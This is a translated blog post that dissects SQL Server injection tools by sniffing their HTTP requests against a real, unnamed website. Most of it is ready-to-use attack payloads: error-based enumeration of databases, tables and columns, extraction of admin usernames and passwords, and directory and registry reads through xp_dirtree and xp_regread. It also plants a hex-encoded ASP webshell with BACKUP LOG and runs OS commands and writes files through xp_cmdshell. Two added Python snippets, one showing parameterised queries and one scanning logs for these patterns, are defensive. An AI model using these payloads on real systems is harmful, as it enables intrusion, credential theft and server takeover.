Combat: Fully understand the SQL Server injection process

Source: Internet
Author: User
Tags: end, expression, file upload, sql, sql injection, sql server, injection, table name, variable

I wanted to understand the process and principles of SQL injection. The articles I found online were all fairly superficial, but I knew of several injection tools that are commonly used domestically, such as Domain3.5, NBSI3.0, Ah D2.32 and Pangolin, plus a few foreign ones, so I decided to study a few of those instead. The sniffer used this time is SNIFFX, which specialises in capturing HTTP packets; it is not powerful, but it is enough for this exercise. I originally wanted to use Ethereal or Wireshark, but when you copy packet contents from them they also copy the raw, un-decoded hex, which is a bit of a nuisance. In other words, I am not yet skilled with those two tools.

"Querying database information"

I did not find a suitably vulnerable system locally, so I had to look on the Internet. Using Domain3.5 I quickly found an injection point on SQL Server with SA permissions, and clicked "Start detection" in Domain3.5.

The following are the Domain3.5 HTTP requests:
news_show.asp?id=15618%20and%201=1
news_show.asp?id=15618%20and%201=2
news_show.asp?id=15618%20and%20exists%20(select%20*%20from%20sysobjects)
news_show.asp?id=15618%20and%20char(124)%2buser%2bchar(124)=0
news_show.asp?id=15618;declare%20@a%20int--
news_show.asp?id=15618%20and%20char(124)%2bdb_name()%2bchar(124)=0
news_show.asp?id=15618%20and%20is_srvrolemember(0x730079007300610064006d0069006e00)=1

The following are the NBSI3.0 HTTP requests:
news_show.asp?id=15618%20and%20user%2bchar(124)=0
news_show.asp?id=15618%20and%20system_user%2bchar(124)=0
news_show.asp?id=15618%20and%20cast(is_srvrolemember(0x730079007300610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1
news_show.asp?id=15618%20and%20db_name()%2bchar(124)=0
news_show.asp?id=15618;declare%20@a%20int--

Ah D's and Pangolin's packets are not listed here; they are essentially the same. The basic process is to use `and 1=1` and `and 1=2` to determine whether the parameter is injectable: typically 1=1 returns HTTP 200 (OK) and 1=2 returns HTTP 500 (internal server error), which indicates that it is. Then `and exists (select * from sysobjects)` determines the database type: sysobjects is the system table that SQL Server keeps in every database to store information about that database's objects, whereas every Access database has its own MSysObjects table. Once the database is identified as SQL Server, the built-in functions user and system_user are compared with 0. system_user is of type nchar and user is of type char, while 0 is certainly an int; because SQL Server has to convert the string to int before it can compare the two, the conversion fails, and on a server that returns detailed error messages the error text contains the sensitive value itself.

For an explanation of user and system_user, follow the MSDN links above.
In `cast(is_srvrolemember(0x730079007300610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1`, cast() explicitly converts an expression of one data type to another data type; CAST and CONVERT provide similar functionality. is_srvrolemember indicates whether the current SQL Server 2005 login is a member of the specified fixed server role; its return type is int, where 0 means not a member and 1 means a member. 0x730079007300610064006d0069006e00 is the hex (UTF-16LE, i.e. nvarchar) encoding of 'sysadmin'; I guess it is hex-encoded to get past web application filters that look for the sysadmin keyword. If the page returns normally (200), the login is sysadmin. Note that casting the int result to nvarchar(1) and appending char(124) again forces a type-conversion error when the result is compared with 1, and that error text is exactly the information the attacker wants. db_name() returns the current database name.
`;declare%20@a%20int--` declares an int variable @a; I do not know what its purpose is.
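To show why the 1=1 / 1=2 pair works as an oracle, here is an added example (not from the original post) that runs the same probe against a concatenated query and against a parameterised one. SQLite stands in for SQL Server, and the news table and its rows are constructed for the demo.

```python
# Added example (not from the original post): the post's "id=15618 and 1=1"
# / "and 1=2" probe against a concatenated query and a parameterised one.
# SQLite stands in for SQL Server; the concatenation defect is the same.
import sqlite3

def make_db():
    """In-memory table with two constructed news rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(15617, "older item"), (15618, "target item")])
    return conn

def show_concat(conn, raw_id):
    """Vulnerable: the raw id parameter is spliced into the SQL text."""
    sql = "SELECT title FROM news WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]

def show_param(conn, raw_id):
    """Hardened: validate the type first, then bind the value as a parameter."""
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    rows = conn.execute("SELECT title FROM news WHERE id=?", (int(raw_id),))
    return [row[0] for row in rows]

def probe(handler, conn):
    """Send the three requests a tool issues first; record what each returns."""
    results = {}
    for raw in ("15618", "15618 and 1=1", "15618 and 1=2"):
        try:
            results[raw] = handler(conn, raw)
        except (ValueError, sqlite3.Error) as exc:
            results[raw] = f"rejected: {type(exc).__name__}"
    return results

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", probe(show_concat, db))
    print("parameterised:", probe(show_param, db))
```

With concatenation the 1=1 and 1=2 requests produce different results, which is precisely the oracle the tools test for; with validation plus binding both probes are rejected identically, so there is nothing to infer from the response.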

The next task is to list the database names on the server (assuming there are 16 databases on it):

    1. news_show.asp?id=15618 and (select char(124)%2bcast(count(1) as varchar(8000))%2bchar(124) from master..sysdatabases)%3e0
    2. news_show.asp?id=15618 and char(124)+(select top 1 cast([name] as varchar(8000)) from (select top 1 dbid,name from [master]..[sysdatabases] order by [dbid]) T order by [dbid] desc)>0
    3. news_show.asp?id=15618 and char(124)+(select top 1 cast([name] as varchar(8000)) from (select top 2 dbid,name from [master]..[sysdatabases] order by [dbid]) T order by [dbid] desc)>0
    4. news_show.asp?id=15618 and (select top 1 cast([name] as nvarchar(4000))%2bchar(124) from (select top N dbid,name from [master].[dbo].[sysdatabases] order by [dbid]) T order by [dbid] desc)>0

First, the URL-encoded characters used above:
%2b - '+'
%3e - '>'
%20 - ' ' (space)
%2f - '/'

I can only say that these SQL statements are quite ingenious, and I began to wonder why subqueries are needed at all. So I simply tried
select top X dbid,name from [master].[dbo].[sysdatabases] order by [dbid]
When X is 1 only the first row comes back and there is no problem: master is returned. But when X is 2 an error occurs:
"The subquery returned more than one value. This is not allowed when the subquery follows =, !=, <, <=, >, >= or when the subquery is used as an expression."
This is where the nested subquery plays its key role: the inner query takes the first X rows in ascending dbid order, and the outer query takes the last of those in descending order, so each value of X selects exactly one database name. At first I also did not know what T was; it turns out that a derived table in SQL Server must have an alias, and T is that alias. The outer query's result is then compared with 0 to force the conversion error, and in this way every database name is leaked.
The first statement, select count(1), returns the number of databases.

Next is to guess table names. Assuming the current database is news, first find the number of tables in that database:
news_show.asp?id=15618 and (select char(124)+cast(count(1) as varchar(8000))+char(124) from news..sysobjects where xtype=0x55)>0
xtype is the object type; 0x55 is 'U', which means a user table. See the linked reference for a detailed explanation.

The table names are then listed one at a time:
news_show.asp?id=15618 and (select top 1 cast(name as nvarchar(4000)) from (select top 1 id,name from [news].[sysobjects] where xtype=0x55 order by id) T order by id desc)>0
Changing the second `top 1` from 1 up to the number of tables walks through all of them.

Then guess the column names. Assuming the table of interest is admin, first get the unique id under which that table is stored in sysobjects:
news_show.asp?id=15618 and (select top 1 cast(id as nvarchar) from [news].[dbo].[sysobjects] where name='admin')>0

Then guess the column names; id is the admin table's id obtained by the query above.
news_show.asp?id=15618 and (select top 1 cast(name as nvarchar(4000))+char(124) from (select top 1 colid,name from [news].[dbo].[syscolumns] where id=1993058136 order by colid) T order by colid desc)>0

Suppose the columns listed are ID, ADMINNAME, ADMINPASSWORD, ADMINPOWER, USERID and CT,
and suppose only the values of AdminName and AdminPassword are wanted.
First look at how many records the admin table has:
news_show.asp?id=15618 and (select cast(count([adminname]) as nvarchar(4000))+char(124) from [news].[admin] where 1=1)>0

Return the first row of data:
news_show.asp?id=15618 and (select top 1 isnull(cast([adminname] as nvarchar(4000)), char(32))+char(124)+isnull(cast([adminpassword] as nvarchar(4000)), char(32)) from (select top 1 [adminname],[adminpassword] from [news].[admin] where 1=1 order by [adminname]) T order by [adminname] desc)>0
isnull() checks whether the value is null and, if it is, returns the second argument instead, char(32), which is a space ' '.
The remaining rows follow the same pattern.

"Read directory -- xp_dirtree"

Drop the table if it exists, then create a table in the current database with three columns: subdirectory, depth and file.
board.asp?id=494;drop table Techguru; create table Techguru (subdirectory nvarchar() null, depth tinyint null, [file] bit null)--

Clear the table's data, then store the output of the xp_dirtree extended stored procedure in the Techguru table. xp_dirtree's first parameter is the path, the second is the depth (0 means unlimited recursion), and the third is the file type: 1 lists folders and files, 0 lists folders only.
board.asp?id=494;delete Techguru;insert Techguru exec master..xp_dirtree 'C:\',1,1--

Start enumerating file and directory names, incrementing the number after the second `top` each time:
board.asp?id=494 and (select top 1 cast([subdirectory] as nvarchar())%2bchar(124)%2bcast([file] as nvarchar(1))%2bchar(124) from (select top 1 [subdirectory],[file] from Techguru order by [file],[subdirectory]) T order by [file] desc,[subdirectory] desc)=0

To remove the table:
board.asp?id=494;drop table Techguru--

"Read registry -- xp_regread"

First, create a table with two columns, value and data:
board.asp?id=494;drop table [Techguru]; create table [Techguru] (value nvarchar(4000) null, data nvarchar(4000) null)--

Execute xp_regread and write its output into the table just created:
board.asp?id=494;delete [Techguru];insert [Techguru] exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','system\Controlset001\services\w3svc\parameters\virtual Roots','/'--

Read it out:
board.asp?id=494 and (select top 1 cast([data] as nvarchar(4000))%2bchar(124) from [Techguru] order by [data] desc)=0

Delete the table:
board.asp?id=494;drop table [Techguru]--

"Upload webshell -- BACKUP LOG xx TO DISK"

BACKUP LOG, truncate 1, truncate 2
Step 1: create the table that will hold the one-line webshell
board.asp?id=494;create table [dbo].[shit_tmp] ([cmd] [image])--
Step 2: 0x7900690061006f006c007500 is the nvarchar hex encoding of 'yiaolu'
board.asp?id=494;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x7900690061006f006c007500 backup log @a to disk=@s with init,no_truncate--
Step 3: 0x3c25657865637574652872657175657374282261222929253e is the hex of <%execute(request("a"))%>
board.asp?id=494;insert into [shit_tmp] (cmd) values (0x3c25657865637574652872657175657374282261222929253e)--
Step 4: 0x64003a005c003100320033002e00610073007000 is the nvarchar hex encoding of d:\123.asp
board.asp?id=494;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x64003a005c003100320033002e00610073007000 backup log @a to disk=@s with init,no_truncate--
Step 5: remove the temporary table
board.asp?id=494;drop table [shit_tmp]--

"Execute command"

;CREATE TABLE [x_2894] ([id] int NOT NULL IDENTITY(1,1), [resulttxt] nvarchar(4000) NULL);
insert INTO [x_2894] (resulttxt) exec master.dbo.xp_cmdshell 'dir c:\';
insert into [x_2894] values ('g_over'); exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

; use master DBCC ADDEXTENDEDPROC ('xp_cmdshell', 'Xplog70.dll')--

and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end from (select top 1 id,resulttxt from [x_2894] order by [id]) T order by [id] desc)>0

......

and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end from (select top N id,resulttxt from [x_2894] order by [id]) T order by [id] desc)>0

g_over is a marker row inserted deliberately so that the end of the command output can be recognised.

;DROP TABLE [x_2894];--

"Local file upload"

Suppose the file is to be written to c:\down.vbs on the server.

; exec master.dbo.xp_cmdshell 'del C:\down.vbs'--

; exec master.dbo.xp_cmdshell 'ecHo [deleteoncopy] >> C:\down.vbs'; exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

; use master DBCC ADDEXTENDEDPROC ('xp_cmdshell', 'Xplog70.dll')--

; exec master.dbo.xp_cmdshell 'ecHo owner=administrator >> C:\down.vbs'; exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

; use master DBCC ADDEXTENDEDPROC ('xp_cmdshell', 'Xplog70.dll')--

; exec master.dbo.xp_cmdshell 'ecHo personalized=5 >> C:\down.vbs'; exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

; use master DBCC ADDEXTENDEDPROC ('xp_cmdshell', 'Xplog70.dll')--

; exec master.dbo.xp_cmdshell 'ecHo personalizedname=my Documents >> C:\down.vbs'; exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

; use master DBCC ADDEXTENDEDPROC ('xp_cmdshell', 'Xplog70.dll')--

In summary, xp_cmdshell is called to execute echo statements that write the file one line at a time.
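As an added example (not part of the original post), the following scans web-server log lines for the request shapes walked through above, from the 1=1 / 1=2 probes through the stacked xp_dirtree and xp_cmdshell calls. The log lines are constructed to mirror the tool packets, and the field layout is a simplified IIS format assumed for the demo.

```python
# Added example (not from the original post): flag the injection request shapes this post walks through.
import re
from urllib.parse import unquote

# Constructed log lines (date time method uri-stem uri-query status).
SAMPLE_LOG = """\
2009-01-01 10:00:01 GET /news_show.asp id=15618 200
2009-01-01 10:00:02 GET /news_show.asp id=15618%20and%201=1 200
2009-01-01 10:00:03 GET /news_show.asp id=15618%20and%201=2 500
2009-01-01 10:00:04 GET /news_show.asp id=15618%20and%20exists%20(select%20*%20from%20sysobjects) 200
2009-01-01 10:00:05 GET /news_show.asp id=15618%20and%20is_srvrolemember(0x730079007300610064006d0069006e00)=1 200
2009-01-01 10:00:06 GET /news_show.asp id=15618%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(124)%20from%20[master].[dbo].[sysdatabases])%3e0 500
2009-01-01 10:00:07 GET /board.asp id=494;insert%20Techguru%20exec%20master..xp_dirtree%20'C:%5c',1,1-- 200
2009-01-01 10:00:08 GET /board.asp id=494;exec%20master.dbo.xp_cmdshell%20'dir%20c:%5c'-- 200
"""

# Most severe first; the first matching rule names the category.
RULES = [
    ("stacked query: extended procedure", re.compile(r";\s*(?:insert\b.*?)?exec\b.*?\bxp_(?:cmdshell|dirtree|regread)\b", re.I)),
    ("stacked query: backup log to disk", re.compile(r"\bbackup\s+log\b.*?\bto\s+disk\b", re.I)),
    ("stacked query: create/drop table", re.compile(r";\s*(?:create|drop)\s+table\b", re.I)),
    ("system table enumeration", re.compile(r"\b(?:sysobjects|sysdatabases|syscolumns)\b", re.I)),
    ("error-based type-conversion probe", re.compile(r"\b(?:cast|user|system_user|db_name|is_srvrolemember)\b.*?(?:char\(124\)|=\s*[01]\b)", re.I)),
    ("boolean probe (and 1=1 / 1=2)", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
]

def classify(query):
    """Category of a URL-decoded query string, or None when no rule fires."""
    for name, pattern in RULES:
        if pattern.search(query):
            return name
    return None

def scan_log(text):
    """Return (timestamp, status, category, decoded query) for each flagged line."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue  # malformed line: skip rather than guess
        date, time, _method, _stem, raw_query, status = parts
        decoded = unquote(raw_query)  # %20 -> space, %2b -> +, %3e -> >
        category = classify(decoded)
        if category:
            hits.append((f"{date} {time}", status, category, decoded))
    return hits

if __name__ == "__main__":
    for ts, status, cat, q in scan_log(SAMPLE_LOG):
        print(f"{ts} {status} {cat}: {q}")
```

Decoding before matching matters because the tools URL-encode the operators (%2b, %3e, %20); the 200/500 status pair on the two boolean probes is the same signal the post describes reading from the tool's side.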

This analysis ends here, but MySQL, Access, Oracle, DB2, Informix ... are still waiting to be explored.


